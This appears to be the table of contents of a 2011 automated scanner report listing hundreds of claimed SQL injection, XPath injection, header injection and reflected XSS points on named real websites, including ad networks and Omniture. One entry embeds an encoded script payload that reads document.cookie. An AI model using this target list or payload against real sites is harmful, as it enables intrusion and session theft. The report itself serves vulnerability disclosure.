The DORK Report, XSS, SQL Injection, HTTP Header Injection

The Daily DORK for Feb. 5, 2011 | CloudScan Vulnerability Crawler

Report generated by CloudScan Vulnerability Crawler at Sun Feb 06 13:05:31 CST 2011.

DORK CWE-79 XSS Report

Loading

1. SQL injection

1.1. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683335** [PG parameter]

1.2. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683335** [i_34 cookie]

1.3. http://blekko.com/ws/+/adsense=9396229490951644 [suggestedSlashtagsList cookie]

1.4. http://blekko.com/ws/+/ip=207.97.227.239 [sessionid cookie]

1.5. http://blekko.com/ws/+/press-videos [fbl cookie]

1.6. http://blekko.com/ws/+/press-videos [name of an arbitrarily supplied request parameter]

1.7. http://blekko.com/ws/+/press-videos [sessionid cookie]

1.8. http://blekko.com/ws/+/press-videos [suggestedSlashtagsList cookie]

1.9. http://blekko.com/ws/+/press-videos [t cookie]

1.10. http://blekko.com/ws/+/press-videos [v cookie]

1.11. http://blekko.com/ws/+/privacy [suggestedSlashtagsList cookie]

1.12. http://blekko.com/ws/xss+/date [name of an arbitrarily supplied request parameter]

1.13. http://blekko.com/ws/xss+/date [suggestedSlashtagsList cookie]

1.14. http://blekko.com/ws/xss+/site=ha.ckers.org [REST URL parameter 2]

1.15. http://googleads.g.doubleclick.net/pagead/ads [color_url parameter]

1.16. http://googleads.g.doubleclick.net/pagead/ads [saldr parameter]

1.17. http://news.google.com/news/story [Referer HTTP header]

1.18. http://offers.lendingtree.com/splitter/splitter.ashx [800Num parameter]

1.19. http://www.google.com/finance [hl\x3den\x26tab\x3dwe\x22 parameter]

1.20. http://www.hotelclub.com/ [Referer HTTP header]

2. XPath injection

2.1. http://entertainment.msn.com/news/ [REST URL parameter 1]

2.2. http://entertainment.msn.com/video/ [REST URL parameter 1]

3. HTTP header injection

3.1. http://ad-emea.doubleclick.net/adi/N5506.150290.INVITEMEDIA/B5070033 [REST URL parameter 1]

3.2. http://ad-emea.doubleclick.net/adi/N5506.150290.INVITEMEDIA/B5070033.24 [REST URL parameter 1]

4. Cross-site scripting (reflected)

4.1. http://ad-emea.doubleclick.net/adi/N5506.150290.INVITEMEDIA/B5070033 [campID parameter]

4.2. http://ad-emea.doubleclick.net/adi/N5506.150290.INVITEMEDIA/B5070033 [crID parameter]

4.3. http://ad-emea.doubleclick.net/adi/N5506.150290.INVITEMEDIA/B5070033 [partnerID parameter]

4.4. http://ad-emea.doubleclick.net/adi/N5506.150290.INVITEMEDIA/B5070033 [pub parameter]

4.5. http://ad-emea.doubleclick.net/adi/N5506.150290.INVITEMEDIA/B5070033 [pubICode parameter]

4.6. http://ad-emea.doubleclick.net/adi/N5506.150290.INVITEMEDIA/B5070033 [sz parameter]

4.7. http://ad-emea.doubleclick.net/adi/N5506.150290.INVITEMEDIA/B5070033 [url parameter]

4.8. http://ad-emea.doubleclick.net/adi/N5506.150290.INVITEMEDIA/B5070033.24 [campID parameter]

4.9. http://ad-emea.doubleclick.net/adi/N5506.150290.INVITEMEDIA/B5070033.24 [crID parameter]

4.10. http://ad-emea.doubleclick.net/adi/N5506.150290.INVITEMEDIA/B5070033.24 [partnerID parameter]

4.11. http://ad-emea.doubleclick.net/adi/N5506.150290.INVITEMEDIA/B5070033.24 [pub parameter]

4.12. http://ad-emea.doubleclick.net/adi/N5506.150290.INVITEMEDIA/B5070033.24 [pubICode parameter]

4.13. http://ad-emea.doubleclick.net/adi/N5506.150290.INVITEMEDIA/B5070033.24 [sz parameter]

4.14. http://ad-emea.doubleclick.net/adi/N5506.150290.INVITEMEDIA/B5070033.24 [url parameter]

4.15. http://ad.doubleclick.net/adi/N3285.google/B2343920.91 [adurl parameter]

4.16. http://ad.doubleclick.net/adi/N3285.google/B2343920.91 [ai parameter]

4.17. http://ad.doubleclick.net/adi/N3285.google/B2343920.91 [client parameter]

4.18. http://ad.doubleclick.net/adi/N3285.google/B2343920.91 [num parameter]

4.19. http://ad.doubleclick.net/adi/N3285.google/B2343920.91 [sig parameter]

4.20. http://ad.doubleclick.net/adi/N3285.google/B2343920.91 [sz parameter]

4.21. http://ad.doubleclick.net/adi/N3285.msn-dm/B2343920.67 [name of an arbitrarily supplied request parameter]

4.22. http://ad.doubleclick.net/adi/N3285.msn-dm/B2343920.67 [sz parameter]

4.23. http://ad.doubleclick.net/adi/dmd.ehow/computers [REST URL parameter 3]

4.24. http://ad.doubleclick.net/adi/dmd.ehow/homepage [REST URL parameter 3]

4.25. http://ad.harrenmedianetwork.com/imp [Z parameter]

4.26. http://ad.harrenmedianetwork.com/imp [s parameter]

4.27. http://ad.harrenmedianetwork.com/st [ad_size parameter]

4.28. http://ad.harrenmedianetwork.com/st [ad_size parameter]

4.29. http://ad.harrenmedianetwork.com/st [section parameter]

4.30. http://ad.harrenmedianetwork.com/st [section parameter]

4.31. http://ad.reduxmedia.com/st [name of an arbitrarily supplied request parameter]

4.32. http://ad.scanmedios.com/imp [Z parameter]

4.33. http://ad.scanmedios.com/imp [s parameter]

4.34. http://ad.scanmedios.com/st [ad_size parameter]

4.35. http://ad.scanmedios.com/st [ad_size parameter]

4.36. http://ad.scanmedios.com/st [section parameter]

4.37. http://ad.scanmedios.com/st [section parameter]

4.38. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683335** [&PID parameter]

4.39. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683335** [10,1,103;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Finvesting_@3F998d7?click parameter]

4.40. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683335** [AN parameter]

4.41. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683335** [ASID parameter]

4.42. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683335** [PG parameter]

4.43. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683335** [TargetID parameter]

4.44. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683335** [UIT parameter]

4.45. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683335** [name of an arbitrarily supplied request parameter]

4.46. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/671239155 [&PID parameter]

4.47. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/671239155 [AN parameter]

4.48. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/671239155 [ASID parameter]

4.49. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/671239155 [PG parameter]

4.50. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/671239155 [REST URL parameter 2]

4.51. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/671239155 [REST URL parameter 3]

4.52. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/671239155 [TargetID parameter]

4.53. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/671239155 [UIT parameter]

4.54. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/671239155 [click parameter]

4.55. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/671239155 [name of an arbitrarily supplied request parameter]

4.56. http://ad.yieldmanager.com/st [name of an arbitrarily supplied request parameter]

4.57. http://api.bizographics.com/v1/profile.json [api_key parameter]

4.58. http://api.bizographics.com/v1/profile.json [callback parameter]

4.59. https://api.bizographics.com/v1/profile.json [api_key parameter]

4.60. http://api.blogburst.com/EntityImageHandler.ashx [REST URL parameter 1]

4.61. http://api.blogburst.com/favicon.ico [REST URL parameter 1]

4.62. http://api.blogburst.com/v1.0/WidgetDeliveryProxy.js [REST URL parameter 2]

4.63. http://api.blogburst.com/v1.0/WidgetDeliveryProxyStub.js [REST URL parameter 2]

4.64. http://api.blogburst.com/v1.0/WidgetDeliveryService.ashx [REST URL parameter 1]

4.65. http://api.blogburst.com/v1.0/WidgetDeliveryService.ashx [REST URL parameter 2]

4.66. http://api.demandbase.com/api/v1/ip.json [callback parameter]

4.67. http://apptools.com/examples/tableheight.php. [REST URL parameter 1]

4.68. http://apptools.com/examples/tableheight.php. [REST URL parameter 2]

4.69. http://apptools.com/examples/tableheight.php. [name of an arbitrarily supplied request parameter]

4.70. http://apptools.com/styles/apptools.css [REST URL parameter 1]

4.71. http://apptools.com/styles/apptools.css [REST URL parameter 2]

4.72. http://apptools.com/styles/print.css [REST URL parameter 1]

4.73. http://apptools.com/styles/print.css [REST URL parameter 2]

4.74. http://b.scorecardresearch.com/beacon.js [c1 parameter]

4.75. http://b.scorecardresearch.com/beacon.js [c2 parameter]

4.76. http://b.scorecardresearch.com/beacon.js [c3 parameter]

4.77. http://b.scorecardresearch.com/beacon.js [c4 parameter]

4.78. http://b.scorecardresearch.com/beacon.js [c5 parameter]

4.79. http://b.scorecardresearch.com/beacon.js [c6 parameter]

4.80. http://blekko.com/autocomplete [query parameter]

4.81. http://blekko.com/autocomplete [term parameter]

4.82. http://boardreader.com/domain/2mdn.net/x22 [name of an arbitrarily supplied request parameter]

4.83. http://boardreader.com/domain/2mdn.net/x22 [name of an arbitrarily supplied request parameter]

4.84. http://boardreader.com/domain/aol.com [name of an arbitrarily supplied request parameter]

4.85. http://boardreader.com/domain/aol.com [name of an arbitrarily supplied request parameter]

4.86. http://boardreader.com/domain/cafemom.com [name of an arbitrarily supplied request parameter]

4.87. http://boardreader.com/domain/cafemom.com [name of an arbitrarily supplied request parameter]

4.88. http://boardreader.com/domain/myegy.com [name of an arbitrarily supplied request parameter]

4.89. http://boardreader.com/domain/myegy.com [name of an arbitrarily supplied request parameter]

4.90. http://boardreader.com/domain/nolanfans.com [name of an arbitrarily supplied request parameter]

4.91. http://boardreader.com/domain/nolanfans.com [name of an arbitrarily supplied request parameter]

4.92. http://boardreader.com/domain/ratedesi.com [name of an arbitrarily supplied request parameter]

4.93. http://boardreader.com/domain/ratedesi.com [name of an arbitrarily supplied request parameter]

4.94. http://boardreader.com/domain/sherdog.net [name of an arbitrarily supplied request parameter]

4.95. http://boardreader.com/domain/sherdog.net [name of an arbitrarily supplied request parameter]

4.96. http://boardreader.com/domain/ufc.com [name of an arbitrarily supplied request parameter]

4.97. http://boardreader.com/domain/ufc.com [name of an arbitrarily supplied request parameter]

4.98. http://boardreader.com/domain/websitetoolbox.com [name of an arbitrarily supplied request parameter]

4.99. http://boardreader.com/domain/websitetoolbox.com [name of an arbitrarily supplied request parameter]

4.100. http://boardreader.com/domain/worldmastiffforum.com [name of an arbitrarily supplied request parameter]

4.101. http://boardreader.com/domain/worldmastiffforum.com [name of an arbitrarily supplied request parameter]

4.102. http://boardreader.com/index.php [ebef7%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E6f696982a6d parameter]

4.103. http://boardreader.com/index.php [extended_search parameter]

4.104. http://boardreader.com/index.php [ltype parameter]

4.105. http://boardreader.com/index.php [name of an arbitrarily supplied request parameter]

4.106. http://boardreader.com/index.php [q parameter]

4.107. http://boardreader.com/index.php [q2 parameter]

4.108. http://boardreader.com/linkinfo/2mdn.net [REST URL parameter 2]

4.109. http://boardreader.com/my/signup.html [name of an arbitrarily supplied request parameter]

4.110. http://boardreader.com/s/2mdn.html [name of an arbitrarily supplied request parameter]

4.111. http://boardreader.com/s/2mdn.html [name of an arbitrarily supplied request parameter]

4.112. http://boardreader.com/site/Monterey_military_Group_CafeMo_764716.html [name of an arbitrarily supplied request parameter]

4.113. http://boardreader.com/site/Nolan_Fans_Forums_8842059.html [name of an arbitrarily supplied request parameter]

4.114. http://boardreader.com/site/RateDesi_Forums_13026.html [name of an arbitrarily supplied request parameter]

4.115. http://boardreader.com/site/Research_Learn_Message_Boards_1404604.html [name of an arbitrarily supplied request parameter]

4.116. http://boardreader.com/site/Sherdog_Mixed_Martial_Arts_For_14952.html [name of an arbitrarily supplied request parameter]

4.117. http://boardreader.com/site/The_CafeMom_Newcomers_Club_Gro_655408.html [name of an arbitrarily supplied request parameter]

4.118. http://boardreader.com/site/The_Mastiff_Sweet_Spot_6024491.html [name of an arbitrarily supplied request parameter]

4.119. http://boardreader.com/site/UFC_Community_Forum_9057873.html [name of an arbitrarily supplied request parameter]

4.120. http://boardreader.com/site/Ultimate_College_Softball_5898982.html [name of an arbitrarily supplied request parameter]

4.121. http://boardreader.com/site/mntdiat_mai_aigi_7486781.html [name of an arbitrarily supplied request parameter]

4.122. http://consumershealthyliving.com/clinical-study.html [name of an arbitrarily supplied request parameter]

4.123. http://dean.edwards.name/weblog/2006/06/again/ [REST URL parameter 1]

4.124. http://dean.edwards.name/weblog/2006/06/again/ [REST URL parameter 1]

4.125. http://dean.edwards.name/weblog/2006/06/again/ [REST URL parameter 4]

4.126. http://dean.edwards.name/weblog/2006/06/again/ [name of an arbitrarily supplied request parameter]

4.127. http://ds.addthis.com/red/psi/p.json [callback parameter]

4.128. http://ds.addthis.com/red/psi/sites/www.ehow.com/p.json [callback parameter]

4.129. http://gocitykids.parentsconnect.com/data/service-calendar.json [jsoncallback parameter]

4.130. http://it.toolbox.com/blogs/database-soup [name of an arbitrarily supplied request parameter]

4.131. http://it.toolbox.com/blogs/database-talk [name of an arbitrarily supplied request parameter]

4.132. http://it.toolbox.com/blogs/db2luw [name of an arbitrarily supplied request parameter]

4.133. http://it.toolbox.com/blogs/db2zos [name of an arbitrarily supplied request parameter]

4.134. http://it.toolbox.com/blogs/elsua [name of an arbitrarily supplied request parameter]

4.135. http://it.toolbox.com/blogs/juice-analytics [name of an arbitrarily supplied request parameter]

4.136. http://it.toolbox.com/blogs/minimalit [name of an arbitrarily supplied request parameter]

4.137. http://it.toolbox.com/blogs/penguinista-databasiensis [name of an arbitrarily supplied request parameter]

4.138. http://it.toolbox.com/blogs/ppmtoday [name of an arbitrarily supplied request parameter]

4.139. http://js.revsci.net/gateway/gw.js [csid parameter]

4.140. http://kona5.kontera.com/KonaGet.js [l parameter]

4.141. http://kona5.kontera.com/KonaGet.js [rId parameter]

4.142. http://millenniumhotels.tt.omtrdc.net/m2/millenniumhotels/mbox/standard [mbox parameter]

4.143. https://my.omniture.com/login/ [name of an arbitrarily supplied request parameter]

4.144. https://my.omniture.com/login/ [name of an arbitrarily supplied request parameter]

4.145. https://my.omniture.com/p/suite/1.2/index.html [jpj parameter]

4.146. https://my.omniture.com/p/suite/1.2/index.html [name of an arbitrarily supplied request parameter]

4.147. https://my.omniture.com/p/suite/1.2/index.html [ssSession parameter]

4.148. http://showads.pubmatic.com/AdServer/AdServerServlet [frameName parameter]

4.149. http://showads.pubmatic.com/AdServer/AdServerServlet [pageURL parameter]

4.150. http://showads.pubmatic.com/AdServer/AdServerServlet [ranreq parameter]

4.151. http://sociallist.org/submit.php [lang parameter]

4.152. http://sociallist.org/submit.php [name of an arbitrarily supplied request parameter]

4.153. http://sociallist.org/submit.php [tag parameter]

4.154. http://sociallist.org/submit.php [text parameter]

4.155. http://sociallist.org/submit.php [title parameter]

4.156. http://sociallist.org/submit.php [type parameter]

4.157. http://sociallist.org/submit.php [url parameter]

4.158. http://track.roiservice.com/track/track.aspx [ROIID parameter]

4.159. http://wp-superslider.com/ [name of an arbitrarily supplied request parameter]

4.160. http://wp-superslider.com/index.php [REST URL parameter 1]

4.161. http://wp-superslider.com/site/wp-content/plugins/si-contact-form/captcha-secureimage/ctf_captcha.js [REST URL parameter 1]

4.162. http://wp-superslider.com/site/wp-content/plugins/si-contact-form/captcha-secureimage/ctf_captcha.js [REST URL parameter 2]

4.163. http://wp-superslider.com/site/wp-content/plugins/si-contact-form/captcha-secureimage/ctf_captcha.js [REST URL parameter 3]

4.164. http://wp-superslider.com/site/wp-content/plugins/si-contact-form/captcha-secureimage/ctf_captcha.js [REST URL parameter 4]

4.165. http://wp-superslider.com/site/wp-content/plugins/si-contact-form/captcha-secureimage/ctf_captcha.js [REST URL parameter 5]

4.166. http://wp-superslider.com/site/wp-content/plugins/si-contact-form/captcha-secureimage/ctf_captcha.js [REST URL parameter 6]

4.167. http://wp-superslider.com/site/wp-content/plugins/superslider-excerpt/plugin-data/superslider/ssExcerpt/default/default.css [REST URL parameter 1]

4.168. http://wp-superslider.com/site/wp-content/plugins/superslider-excerpt/plugin-data/superslider/ssExcerpt/default/default.css [REST URL parameter 2]

4.169. http://wp-superslider.com/site/wp-content/plugins/superslider-excerpt/plugin-data/superslider/ssExcerpt/default/default.css [REST URL parameter 3]

4.170. http://wp-superslider.com/site/wp-content/plugins/superslider-excerpt/plugin-data/superslider/ssExcerpt/default/default.css [REST URL parameter 4]

4.171. http://wp-superslider.com/site/wp-content/plugins/superslider-excerpt/plugin-data/superslider/ssExcerpt/default/default.css [REST URL parameter 5]

4.172. http://wp-superslider.com/site/wp-content/plugins/superslider-excerpt/plugin-data/superslider/ssExcerpt/default/default.css [REST URL parameter 6]

4.173. http://wp-superslider.com/site/wp-content/plugins/superslider-excerpt/plugin-data/superslider/ssExcerpt/default/default.css [REST URL parameter 7]

4.174. http://wp-superslider.com/site/wp-content/plugins/superslider-excerpt/plugin-data/superslider/ssExcerpt/default/default.css [REST URL parameter 8]

4.175. http://wp-superslider.com/site/wp-content/plugins/superslider-excerpt/plugin-data/superslider/ssExcerpt/default/default.css [REST URL parameter 9]

4.176. http://wp-superslider.com/site/wp-content/plugins/superslider-login/plugin-data/superslider/ssLogin/default/default_horizontal.css [REST URL parameter 1]

4.177. http://wp-superslider.com/site/wp-content/plugins/superslider-login/plugin-data/superslider/ssLogin/default/default_horizontal.css [REST URL parameter 2]

4.178. http://wp-superslider.com/site/wp-content/plugins/superslider-login/plugin-data/superslider/ssLogin/default/default_horizontal.css [REST URL parameter 3]

4.179. http://wp-superslider.com/site/wp-content/plugins/superslider-login/plugin-data/superslider/ssLogin/default/default_horizontal.css [REST URL parameter 4]

4.180. http://wp-superslider.com/site/wp-content/plugins/superslider-login/plugin-data/superslider/ssLogin/default/default_horizontal.css [REST URL parameter 5]

4.181. http://wp-superslider.com/site/wp-content/plugins/superslider-login/plugin-data/superslider/ssLogin/default/default_horizontal.css [REST URL parameter 6]

4.182. http://wp-superslider.com/site/wp-content/plugins/superslider-login/plugin-data/superslider/ssLogin/default/default_horizontal.css [REST URL parameter 7]

4.183. http://wp-superslider.com/site/wp-content/plugins/superslider-login/plugin-data/superslider/ssLogin/default/default_horizontal.css [REST URL parameter 8]

4.184. http://wp-superslider.com/site/wp-content/plugins/superslider-login/plugin-data/superslider/ssLogin/default/default_horizontal.css [REST URL parameter 9]

4.185. http://wp-superslider.com/site/wp-content/plugins/superslider-menu/js/nav-follow-min.js [REST URL parameter 1]

4.186. http://wp-superslider.com/site/wp-content/plugins/superslider-menu/js/nav-follow-min.js [REST URL parameter 2]

4.187. http://wp-superslider.com/site/wp-content/plugins/superslider-menu/js/nav-follow-min.js [REST URL parameter 3]

4.188. http://wp-superslider.com/site/wp-content/plugins/superslider-menu/js/nav-follow-min.js [REST URL parameter 4]

4.189. http://wp-superslider.com/site/wp-content/plugins/superslider-menu/js/nav-follow-min.js [REST URL parameter 5]

4.190. http://wp-superslider.com/site/wp-content/plugins/superslider-menu/js/nav-follow-min.js [REST URL parameter 6]

4.191. http://wp-superslider.com/site/wp-content/plugins/superslider-menu/js/superslider-menu-min.js [REST URL parameter 1]

4.192. http://wp-superslider.com/site/wp-content/plugins/superslider-menu/js/superslider-menu-min.js [REST URL parameter 2]

4.193. http://wp-superslider.com/site/wp-content/plugins/superslider-menu/js/superslider-menu-min.js [REST URL parameter 3]

4.194. http://wp-superslider.com/site/wp-content/plugins/superslider-menu/js/superslider-menu-min.js [REST URL parameter 4]

4.195. http://wp-superslider.com/site/wp-content/plugins/superslider-menu/js/superslider-menu-min.js [REST URL parameter 5]

4.196. http://wp-superslider.com/site/wp-content/plugins/superslider-menu/js/superslider-menu-min.js [REST URL parameter 6]

4.197. http://wp-superslider.com/site/wp-content/plugins/superslider-menu/plugin-data/superslider/ssMenu/default/default.css [REST URL parameter 1]

4.198. http://wp-superslider.com/site/wp-content/plugins/superslider-menu/plugin-data/superslider/ssMenu/default/default.css [REST URL parameter 2]

4.199. http://wp-superslider.com/site/wp-content/plugins/superslider-menu/plugin-data/superslider/ssMenu/default/default.css [REST URL parameter 3]

4.200. http://wp-superslider.com/site/wp-content/plugins/superslider-menu/plugin-data/superslider/ssMenu/default/default.css [REST URL parameter 4]

4.201. http://wp-superslider.com/site/wp-content/plugins/superslider-menu/plugin-data/superslider/ssMenu/default/default.css [REST URL parameter 5]

4.202. http://wp-superslider.com/site/wp-content/plugins/superslider-menu/plugin-data/superslider/ssMenu/default/default.css [REST URL parameter 6]

4.203. http://wp-superslider.com/site/wp-content/plugins/superslider-menu/plugin-data/superslider/ssMenu/default/default.css [REST URL parameter 7]

4.204. http://wp-superslider.com/site/wp-content/plugins/superslider-menu/plugin-data/superslider/ssMenu/default/default.css [REST URL parameter 8]

4.205. http://wp-superslider.com/site/wp-content/plugins/superslider-menu/plugin-data/superslider/ssMenu/default/default.css [REST URL parameter 9]

4.206. http://wp-superslider.com/site/wp-content/plugins/superslider-postsincat/js/mootools-1.2.3-core-yc.js [REST URL parameter 1]

4.207. http://wp-superslider.com/site/wp-content/plugins/superslider-postsincat/js/mootools-1.2.3-core-yc.js [REST URL parameter 2]

4.208. http://wp-superslider.com/site/wp-content/plugins/superslider-postsincat/js/mootools-1.2.3-core-yc.js [REST URL parameter 3]

4.209. http://wp-superslider.com/site/wp-content/plugins/superslider-postsincat/js/mootools-1.2.3-core-yc.js [REST URL parameter 4]

4.210. http://wp-superslider.com/site/wp-content/plugins/superslider-postsincat/js/mootools-1.2.3-core-yc.js [REST URL parameter 5]

4.211. http://wp-superslider.com/site/wp-content/plugins/superslider-postsincat/js/mootools-1.2.3-core-yc.js [REST URL parameter 6]

4.212. http://wp-superslider.com/site/wp-content/plugins/superslider-postsincat/js/mootools-1.2.3.1-more.js [REST URL parameter 1]

4.213. http://wp-superslider.com/site/wp-content/plugins/superslider-postsincat/js/mootools-1.2.3.1-more.js [REST URL parameter 2]

4.214. http://wp-superslider.com/site/wp-content/plugins/superslider-postsincat/js/mootools-1.2.3.1-more.js [REST URL parameter 3]

4.215. http://wp-superslider.com/site/wp-content/plugins/superslider-postsincat/js/mootools-1.2.3.1-more.js [REST URL parameter 4]

4.216. http://wp-superslider.com/site/wp-content/plugins/superslider-postsincat/js/mootools-1.2.3.1-more.js [REST URL parameter 5]

4.217. http://wp-superslider.com/site/wp-content/plugins/superslider-postsincat/js/mootools-1.2.3.1-more.js [REST URL parameter 6]

4.218. http://wp-superslider.com/site/wp-content/plugins/superslider-postsincat/js/slideBox-v1.0.js [REST URL parameter 1]

4.219. http://wp-superslider.com/site/wp-content/plugins/superslider-postsincat/js/slideBox-v1.0.js [REST URL parameter 2]

4.220. http://wp-superslider.com/site/wp-content/plugins/superslider-postsincat/js/slideBox-v1.0.js [REST URL parameter 3]

4.221. http://wp-superslider.com/site/wp-content/plugins/superslider-postsincat/js/slideBox-v1.0.js [REST URL parameter 4]

4.222. http://wp-superslider.com/site/wp-content/plugins/superslider-postsincat/js/slideBox-v1.0.js [REST URL parameter 5]

4.223. http://wp-superslider.com/site/wp-content/plugins/superslider-postsincat/js/slideBox-v1.0.js [REST URL parameter 6]

4.224. http://wp-superslider.com/site/wp-content/plugins/superslider-postsincat/plugin-data/superslider/ssPostinCat/default/default.css [REST URL parameter 1]

4.225. http://wp-superslider.com/site/wp-content/plugins/superslider-postsincat/plugin-data/superslider/ssPostinCat/default/default.css [REST URL parameter 2]

4.226. http://wp-superslider.com/site/wp-content/plugins/superslider-postsincat/plugin-data/superslider/ssPostinCat/default/default.css [REST URL parameter 3]

4.227. http://wp-superslider.com/site/wp-content/plugins/superslider-postsincat/plugin-data/superslider/ssPostinCat/default/default.css [REST URL parameter 4]

4.228. http://wp-superslider.com/site/wp-content/plugins/superslider-postsincat/plugin-data/superslider/ssPostinCat/default/default.css [REST URL parameter 5]

4.229. http://wp-superslider.com/site/wp-content/plugins/superslider-postsincat/plugin-data/superslider/ssPostinCat/default/default.css [REST URL parameter 6]

4.230. http://wp-superslider.com/site/wp-content/plugins/superslider-postsincat/plugin-data/superslider/ssPostinCat/default/default.css [REST URL parameter 7]

4.231. http://wp-superslider.com/site/wp-content/plugins/superslider-postsincat/plugin-data/superslider/ssPostinCat/default/default.css [REST URL parameter 8]

4.232. http://wp-superslider.com/site/wp-content/plugins/superslider-postsincat/plugin-data/superslider/ssPostinCat/default/default.css [REST URL parameter 9]

4.233. http://wp-superslider.com/site/wp-content/plugins/superslider-show/js/lightbox.js [REST URL parameter 1]

4.234. http://wp-superslider.com/site/wp-content/plugins/superslider-show/js/lightbox.js [REST URL parameter 2]

4.235. http://wp-superslider.com/site/wp-content/plugins/superslider-show/js/lightbox.js [REST URL parameter 3]

4.236. http://wp-superslider.com/site/wp-content/plugins/superslider-show/js/lightbox.js [REST URL parameter 4]

4.237. http://wp-superslider.com/site/wp-content/plugins/superslider-show/js/lightbox.js [REST URL parameter 5]

4.238. http://wp-superslider.com/site/wp-content/plugins/superslider-show/js/lightbox.js [REST URL parameter 6]

4.239. http://wp-superslider.com/site/wp-content/plugins/superslider-show/js/slideshow.js [REST URL parameter 1]

4.240. http://wp-superslider.com/site/wp-content/plugins/superslider-show/js/slideshow.js [REST URL parameter 2]

4.241. http://wp-superslider.com/site/wp-content/plugins/superslider-show/js/slideshow.js [REST URL parameter 3]

4.242. http://wp-superslider.com/site/wp-content/plugins/superslider-show/js/slideshow.js [REST URL parameter 4]

4.243. http://wp-superslider.com/site/wp-content/plugins/superslider-show/js/slideshow.js [REST URL parameter 5]

4.244. http://wp-superslider.com/site/wp-content/plugins/superslider-show/js/slideshow.js [REST URL parameter 6]

4.245. http://wp-superslider.com/site/wp-content/plugins/superslider-show/js/slimbox.js [REST URL parameter 1]

4.246. http://wp-superslider.com/site/wp-content/plugins/superslider-show/js/slimbox.js [REST URL parameter 2]

4.247. http://wp-superslider.com/site/wp-content/plugins/superslider-show/js/slimbox.js [REST URL parameter 3]

4.248. http://wp-superslider.com/site/wp-content/plugins/superslider-show/js/slimbox.js [REST URL parameter 4]

4.249. http://wp-superslider.com/site/wp-content/plugins/superslider-show/js/slimbox.js [REST URL parameter 5]

4.250. http://wp-superslider.com/site/wp-content/plugins/superslider-show/js/slimbox.js [REST URL parameter 6]

4.251. http://wp-superslider.com/site/wp-content/plugins/superslider-show/plugin-data/superslider/ssShow/default/default.css [REST URL parameter 1]

4.252. http://wp-superslider.com/site/wp-content/plugins/superslider-show/plugin-data/superslider/ssShow/default/default.css [REST URL parameter 2]

4.253. http://wp-superslider.com/site/wp-content/plugins/superslider-show/plugin-data/superslider/ssShow/default/default.css [REST URL parameter 3]

4.254. http://wp-superslider.com/site/wp-content/plugins/superslider-show/plugin-data/superslider/ssShow/default/default.css [REST URL parameter 4]

4.255. http://wp-superslider.com/site/wp-content/plugins/superslider-show/plugin-data/superslider/ssShow/default/default.css [REST URL parameter 5]

4.256. http://wp-superslider.com/site/wp-content/plugins/superslider-show/plugin-data/superslider/ssShow/default/default.css [REST URL parameter 6]

4.257. http://wp-superslider.com/site/wp-content/plugins/superslider-show/plugin-data/superslider/ssShow/default/default.css [REST URL parameter 7]

4.258. http://wp-superslider.com/site/wp-content/plugins/superslider-show/plugin-data/superslider/ssShow/default/default.css [REST URL parameter 8]

4.259. http://wp-superslider.com/site/wp-content/plugins/superslider-show/plugin-data/superslider/ssShow/default/default.css [REST URL parameter 9]

4.260. http://wp-superslider.com/site/wp-content/plugins/superslider-show/plugin-data/superslider/ssShow/lightbox/lightbox.css [REST URL parameter 1]

4.261. http://wp-superslider.com/site/wp-content/plugins/superslider-show/plugin-data/superslider/ssShow/lightbox/lightbox.css [REST URL parameter 2]

4.262. http://wp-superslider.com/site/wp-content/plugins/superslider-show/plugin-data/superslider/ssShow/lightbox/lightbox.css [REST URL parameter 3]

4.263. http://wp-superslider.com/site/wp-content/plugins/superslider-show/plugin-data/superslider/ssShow/lightbox/lightbox.css [REST URL parameter 4]

4.264. http://wp-superslider.com/site/wp-content/plugins/superslider-show/plugin-data/superslider/ssShow/lightbox/lightbox.css [REST URL parameter 5]

4.265. http://wp-superslider.com/site/wp-content/plugins/superslider-show/plugin-data/superslider/ssShow/lightbox/lightbox.css [REST URL parameter 6]

4.266. http://wp-superslider.com/site/wp-content/plugins/superslider-show/plugin-data/superslider/ssShow/lightbox/lightbox.css [REST URL parameter 7]

4.267. http://wp-superslider.com/site/wp-content/plugins/superslider-show/plugin-data/superslider/ssShow/lightbox/lightbox.css [REST URL parameter 8]

4.268. http://wp-superslider.com/site/wp-content/plugins/superslider-show/plugin-data/superslider/ssShow/lightbox/lightbox.css [REST URL parameter 9]

4.269. http://wp-superslider.com/site/wp-content/plugins/superslider-slimbox/plugin-data/superslider/ssSlimbox/default/default.css [REST URL parameter 1]

4.270. http://wp-superslider.com/site/wp-content/plugins/superslider-slimbox/plugin-data/superslider/ssSlimbox/default/default.css [REST URL parameter 2]

